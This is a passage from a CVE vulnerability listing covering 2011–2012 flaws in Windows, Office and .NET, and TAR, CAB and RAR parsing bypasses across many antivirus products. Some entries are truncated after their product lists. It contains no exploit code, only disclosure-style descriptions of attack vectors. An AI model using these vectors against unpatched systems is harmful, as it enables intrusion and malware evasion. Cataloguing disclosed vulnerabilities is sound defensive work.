Vulnerability." [CVE-2012-1850] The Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle RAP responses, which allows remote attackers to cause a denial of service (service hang) via crafted RAP packets, aka "Remote Administration Protocol Denial of Service Vulnerability." [CVE-2012-1848] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Scrollbar Calculation Vulnerability." [CVE-2012-1847] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-1537] Heap-based buffer overflow in DirectPlay in DirectX 9.0 through 11.1 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted Office document, aka "DirectPlay Heap Overflow Vulnerability." [CVE-2012-1528] Integer overflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Overflow Vulnerability." [CVE-2012-1527] Integer underflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Underflow Vulnerability." [CVE-2012-1459] The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1457] The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1453] The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Sophos Anti-Virus 4.61.0, Trend Micro AntiVirus 9.120.0.1004, McAfee Gateway (formerly Webwasher) 2010.1C, Emsisoft Anti-Malware 5.1.0.1, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Rising Antivirus 22.83.00.03, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via a CAB file with a modified coffFiles field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CAB parser implementations. [CVE-2012-1443] The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations. [CVE-2012-1420] The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Command Antivirus 5.2.11.5, F-Prot Antivirus 4.6.2.117, Fortinet Antivirus 4.2.254.0, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, Panda Antivirus 10.0.2.7, and Rising Antivirus 22.83.00.03 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \7fELF character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1194] The resolver in the DNS Server service in Microsoft Windows Server 2008 before R2 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack. [CVE-2012-0185] Heap-based buffer overflow in Microsoft Excel 2007 SP2 and SP3 and 2010 Gold and SP1, Excel Viewer, and Office Compatibility Pack SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted spreadsheet that triggers incorrect handling of memory during opening, aka "Excel MergeCells Record Heap Overflow Vulnerability." [CVE-2012-0184] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0183] Microsoft Word 2003 SP3 and 2007 SP2 and SP3, Office 2008 and 2011 for Mac, and Office Compatibility Pack SP2 and SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted RTF data, aka "RTF Mismatch Vulnerability." [CVE-2012-0182] Microsoft Word 2007 SP2 and SP3 does not properly handle memory during the parsing of Word documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "Word PAPX Section Corruption Vulnerability." [CVE-2012-0181] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly manage Keyboard Layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout File Vulnerability." [CVE-2012-0180] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode for (1) windows and (2) messages, which allows local users to gain privileges via a crafted application, aka "Windows and Messages Vulnerability." [CVE-2012-0179] Double free vulnerability in tcpip.sys in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that binds an IPv6 address to a local interface, aka "TCP/IP Double Free Vulnerability." [CVE-2012-0178] Race condition in partmgr.sys in Windows Partition Manager in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that makes multiple simultaneous Plug and Play (PnP) Configuration Manager function calls, aka "Plug and Play (PnP) Configuration Manager Vulnerability." [CVE-2012-0177] Heap-based buffer overflow in the Office Works File Converter in Microsoft Office 2007 SP2, Works 9, and Works 6-9 File Converter allows remote attackers to execute arbitrary code via a crafted Works (aka .wps) file, aka "Office WPS Converter Heap Overflow Vulnerability." [CVE-2012-0175] The Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted name for a (1) file or (2) directory, aka "Command Injection Vulnerability." [CVE-2012-0174] Windows Firewall in tcpip.sys in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly enforce firewall rules for outbound broadcast packets, which allows remote attackers to obtain potentially sensitive information by observing broadcast traffic on a local network, aka "Windows Firewall Bypass Vulnerability." [CVE-2012-0173] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability," a different vulnerability than CVE-2012-0002. [CVE-2012-0167] Heap-based buffer overflow in the Office GDI+ library in Microsoft Office 2003 SP3 and 2007 SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted EMF image in an Office document, aka "GDI+ Heap Overflow Vulnerability." [CVE-2012-0165] GDI+ in Microsoft Windows Vista SP2 and Server 2008 SP2 and Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 does not properly validate record types in EMF images, which allows remote attackers to execute arbitrary code via a crafted image, aka "GDI+ Record Type Vulnerability." [CVE-2012-0163] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly validate function parameters, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Parameter Validation Vulnerability." [CVE-2012-0161] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5 SP1, 3.5.1, and 4 does not properly handle an unspecified exception during use of partially trusted assemblies to serialize input data, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Serialization Vulnerability." [CVE-2012-0160] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5 SP1, 3.5.1, and 4 does not properly serialize input data, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Serialization Vulnerability." [CVE-2012-0159] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview [CVE-2012-0158] The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0157] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle window messaging, which allows local users to gain privileges via a crafted application that calls the PostMessage function, aka "PostMessage Function Vulnerability." [CVE-2012-0156] DirectWrite in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly render Unicode characters, which allows remote attackers to cause a denial of service (application hang) via a (1) instant message or (2) web site, aka "DirectWrite Application Denial of Service Vulnerability." [CVE-2012-0154] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers keyboard layout errors, aka "Keyboard Layout Use After Free Vulnerability." [CVE-2012-0152] The Remote Desktop Protocol (RDP) service in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (application hang) via a series of crafted packets, aka "Terminal Server Denial of Service Vulnerability." [CVE-2012-0151] The Authenticode Signature Verification function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly validate the digest of a signed portable executable (PE) file, which allows user-assisted remote attackers to execute arbitrary code via a modified file with additional content, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2012-0150] Buffer overflow in msvcrt.dll in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, aka "Msvcrt.dll Buffer Overflow Vulnerability." [CVE-2012-0149] afd.sys in the Ancillary Function Driver in Microsoft Windows Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2012-0148] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "AfdPoll Elevation of Privilege Vulnerability." [CVE-2012-0143] Microsoft Excel 2003 SP3 and Office 2008 for Mac do not properly handle memory during the opening of files, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Memory Corruption Using Various Modified Bytes Vulnerability." [CVE-2012-0142] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0141] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0015] Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly calculate the length of an unspecified buffer, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Heap Corruption Vulnerability." [CVE-2012-0014] Microsoft .NET Framework 2.0 SP2, 3.5.1, and 4, and Silverlight 4 before 4.1.10111, does not properly restrict access to memory associated with unmanaged objects, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Unmanaged Objects Vulnerability." [CVE-2012-0013] Incomplete blacklist vulnerability in the Windows Packager configuration in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted ClickOnce application in a Microsoft Office document, related to .application files, aka "Assembly Execution Vulnerability." [CVE-2012-0009] Untrusted search path vulnerability in the Windows Object Packager configuration in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse executable file in the current working directory, as demonstrated by a directory that contains a file with an embedded packaged object, aka "Object Packager Insecure Executable Launching Vulnerability." [CVE-2012-0008] Untrusted search path vulnerability in Microsoft Visual Studio 2008 SP1, 2010, and 2010 SP1 allows local users to gain privileges via a Trojan horse add-in in an unspecified directory, aka "Visual Studio Add-In Vulnerability." [CVE-2012-0006] The DNS server in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 does not properly handle objects in memory during record lookup, which allows remote attackers to cause a denial of service (daemon restart) via a crafted query, aka "DNS Denial of Service Vulnerability." [CVE-2012-0005] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2, when a Chinese, Japanese, or Korean system locale is used, can access uninitialized memory during the processing of Unicode characters, which allows local users to gain privileges via a crafted application, aka "CSRSS Elevation of Privilege Vulnerability." [CVE-2012-0004] Unspecified vulnerability in DirectShow in DirectX in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, related to Quartz.dll, Qdvd.dll, closed captioning, and the Line21 DirectShow filter, aka "DirectShow Remote Code Execution Vulnerability." [CVE-2012-0003] Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability." [CVE-2012-0002] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-0001] The kernel in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly load structured exception handling tables, which allows context-dependent attackers to bypass the SafeSEH security feature by leveraging a Visual C++ .NET 2003 application, aka "Windows Kernel SafeSEH Bypass Vulnerability." [CVE-2011-5046] The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability." [CVE-2011-4434] Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 do not properly enforce AppLocker rules, which allows local users to bypass intended access restrictions via a (1) macro or (2) scripting feature in an application, as demonstrated by Microsoft Office applications and the SANDBOX_INERT and LOAD_IGNORE_CODE_AUTHZ_LEVEL flags. [CVE-2011-3417] The Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0, when sliding expiry is enabled, does not properly handle cached content, which allows remote attackers to obtain access to arbitrary user accounts via a crafted URL, aka "ASP.NET Forms Authentication Ticket Caching Vulnerability." [CVE-2011-3416] The Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 allows remote authenticated users to obtain access to arbitrary user accounts via a crafted username, aka "ASP.Net Forms Authentication Bypass Vulnerability." [CVE-2011-3415] Open redirect vulnerability in the Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted return URL, aka "Insecure Redirect in .NET Form Authentication Vulnerability." [CVE-2011-3414] The CaseInsensitiveHashProvider.getHashCode function in the HashTable implementation in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters, aka "Collisions in HashTable May Cause DoS Vulnerability." [CVE-2011-3413] Microsoft PowerPoint 2007 SP2 [CVE-2011-3412] Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect memory handling, aka "Publisher Memory Corruption Vulnerability." [CVE-2011-3411] Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect handling of values in memory, aka "Publisher Invalid Pointer Vulnerability." [CVE-2011-3410] Array index error in Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect handling of values in memory, aka "Publisher Out-of-bounds Array Index Vulnerability." [CVE-2011-3408] Csrsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2011-3406] Buffer overflow in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote authenticated users to execute arbitrary code via a crafted query that leverages incorrect memory initialization, aka "Active Directory Buffer Overflow Vulnerability." [CVE-2011-3403] Microsoft Excel 2003 SP3 and Office 2004 for Mac do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted Excel spreadsheet, aka "Record Memory Corruption Vulnerability." [CVE-2011-3402] Unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page, as exploited in the wild in November 2011 by Duqu, aka "TrueType Font Parsing Vulnerability." [CVE-2011-3400] Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 do not properly handle OLE objects in memory, which allows remote attackers to execute arbitrary code via a crafted object in a file, aka "OLE Property Vulnerability." [CVE-2011-3397] The Microsoft Time component in DATIME.DLL in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted web site that leverages an unspecified "binary behavior" in Internet Explorer, aka "Microsoft Time Remote Code Execution Vulnerability." [CVE-2011-3396] Untrusted search path vulnerability in Microsoft PowerPoint 2007 SP2 and 2010 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "PowerPoint Insecure Library Loading Vulnerability." [CVE-2011-2019] Untrusted search path vulnerability in Microsoft Internet Explorer 9 on Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an HTML file, aka "Internet Explorer Insecure Library Loading Vulnerability." [CVE-2011-2018] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 does not properly initialize objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2011-2016] Untrusted search path vulnerability in Windows Mail and Windows Meeting Space in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .eml or .wcinv file, aka "Windows Mail Insecure Library Loading Vulnerability." [CVE-2011-2014] The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability." [CVE-2011-2013] Integer overflow in the TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code by sending a sequence of crafted UDP packets to a closed port, aka "Reference Counter Overflow Vulnerability." [CVE-2011-2011] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-2008] Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Access of Unallocated Memory DoS Vulnerability." [CVE-2011-2007] Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Endless Loop DoS in snabase.exe Vulnerability." [CVE-2011-2005] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-2004] Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a crafted TrueType font file, aka "TrueType Font Parsing Vulnerability," a different vulnerability than CVE-2011-3402. [CVE-2011-2003] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability." [CVE-2011-2002] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle TrueType fonts, which allows local users to cause a denial of service (system hang) via a crafted font file, aka "Win32k TrueType Font Type Translation Vulnerability." [CVE-2011-1991] Multiple untrusted search path vulnerabilities in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .rtf, or .txt file, related to (1) deskpan.dll in the Display Panning CPL Extension, (2) EAPHost Authenticator Service, (3) Folder Redirection, (4) HyperTerminal, (5) the Japanese Input Method Editor (IME), and (6) Microsoft Management Console (MMC), aka "Windows Components Insecure Library Loading Vulnerability." [CVE-2011-1990] Microsoft Excel 2007 SP2 [CVE-2011-1989] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1988] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1987] Array index error in Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1986] Use-after-free vulnerability in Microsoft Excel 2003 SP3 allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Use after Free WriteAV Vulnerability." [CVE-2011-1985] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to 